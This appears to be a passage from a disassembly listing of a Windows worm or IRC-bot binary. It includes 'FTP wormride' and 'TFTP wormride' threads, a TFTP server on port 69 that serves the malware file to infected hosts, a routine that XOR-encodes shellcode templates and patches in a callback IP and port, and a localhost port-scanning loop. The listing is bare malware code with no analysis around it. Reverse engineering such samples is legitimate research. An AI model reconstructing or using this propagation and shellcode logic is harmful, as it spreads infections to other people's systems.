; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call dword_417238 ; ntohs
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EBBC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, byte_41DEC0
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EBA0
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EBA4
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DB3C
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; sub_410B52+41�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp dword_41EBAC, 0
jnz loc_4128A0
mov dword_41EBAC, 1
and [ebp+var_20C], 0
